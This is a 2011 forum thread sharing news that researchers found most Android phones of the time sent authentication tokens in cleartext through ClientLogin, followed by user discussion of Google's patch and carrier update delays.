Most Androids are vulnerable to account theft

Discussion in 'User Submitted News' started by TehSkull, May 19, 2011.

Thread Status:
Not open for further replies.
May 19, 2011
  1. TehSkull
    OP

    Member TehSkull Living the life

    Joined:
    Nov 29, 2009
    Messages:
    2,700
    Location:
    Louisiana
    Country:
    United States
    Researchers at Germany’s University of Ulm have made some unsettling discoveries about the security of the Android platform. According to an article from The Register, the research group located a vulnerability that allows hackers to collect and use the digital tokens saved on a phone after a user inputs credentials for a password-protected service.

    The problem seems to be linked to an authentication protocol called ClientLogin, which is present in version of Android 2.3.3 and earlier (aka most Android phones). After a user inputs credentials for services like Twitter, Facebook, or Google Calendar (to name a few), the programming interface retrieves an authentication token, which is sent in cleartext. “Because the authToken can be used for up to 14 days in any subsequent requests on the service, attackers can exploit them to gain unauthorized access to accounts,” claimed the article, quoting University of Ulm researchers.

    Google has released a patch to solve the ClientLogin protocol problem, but the patch only works for Android 2.3.4 and Android 3.0, meaning that about 99 percent of Android phones don’t have access to the updated code. “We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis,” the researchers in the university’s Institute of Media Informatics wrote. “The short answer is: Yes, it is possible, and it is quite easy to do so.” Google has yet to release an official statement on the situation.[/p]
    [​IMG] Source

    This is a serious problem. Almost every Android phone out there is on 2.3.3 or lower, which means almost every Android is susceptible to account theft. I can confirm this is true, because my Facebook account was hacked not even a week after buying my first Android. Possibly a coincidence, but I doubt it.
     
  2. GreatZimkogway

    Member GreatZimkogway Touhou Fanatic

    Joined:
    Jul 21, 2009
    Messages:
    2,140
    Location:
    Imoriata
    Country:
    United States
    Everything is vulnerable. They'll patch it up and force all carriers to make an update ASAP.
     
  3. L551

    Member L551 GBAtemp Regular

    Joined:
    Mar 21, 2010
    Messages:
    109
    Country:
    United States
    Everything seems to have a vulnerability lately, doesn't it? o.O Well mainly sony, but still.

    Hope they find a way to patch 2.3.3 and below for those users. (Most phones are still on 2.1/2.2) I don't want this to turn into a widespread thing... though I'm on 2.3.4.
     
  4. CarbonX13

    Member CarbonX13 GBAtemp 台灣人

    Joined:
    Aug 27, 2010
    Messages:
    1,399
    Location:
    Vancouver, B.C.
    Country:
    Taiwan
    Google's applying a 'stealth patch' to everyone's devices in the next few days. The patch will not require any carriers to officially push it out, nor you to actually perform the update. Google says you'll hardly notice them patching your phone.

    Source

    Edit: Also... http://gbatemp.net/t293263-more-than-99-of...ly-leaking-data
     
  5. TehSkull
    OP

    Member TehSkull Living the life

    Joined:
    Nov 29, 2009
    Messages:
    2,700
    Location:
    Louisiana
    Country:
    United States
    I guess I didn't look back enough pages. :/
    What the? How the? I looked through 3 pages, and didn't see it. :|
     
  6. RupeeClock

    Member RupeeClock Colors 3D Snivy!

    Joined:
    May 15, 2008
    Messages:
    6,307
    Country:
    United Kingdom
    I don't particularly see how this differs from vulnerabilities found in things like Windows OSs or Firefox, these sorts of problems are discovered all the time and promptly patched.

    I suppose the difference is that the vulnerability exists in a device that is always communicating with other devices and connections, leaving it much more open than other things.
     
  7. TehSkull
    OP

    Member TehSkull Living the life

    Joined:
    Nov 29, 2009
    Messages:
    2,700
    Location:
    Louisiana
    Country:
    United States
    That, and it's up to the OEM/Carrier, not Google, as to when patches get rolled out. People who run Cyanogenmod or the like are always on the latest version from Google, but those with stock ROMs have to wait on their carrier to okay the update.
     
  8. Rydian

    Member Rydian Resident Furvert™

    Joined:
    Feb 4, 2010
    Messages:
    27,883
    Location:
    Cave Entrance, Watching Cyan Write Letters
    Country:
    United States
    As stated, a repeat.
     
Thread Status:
Not open for further replies.

Share This Page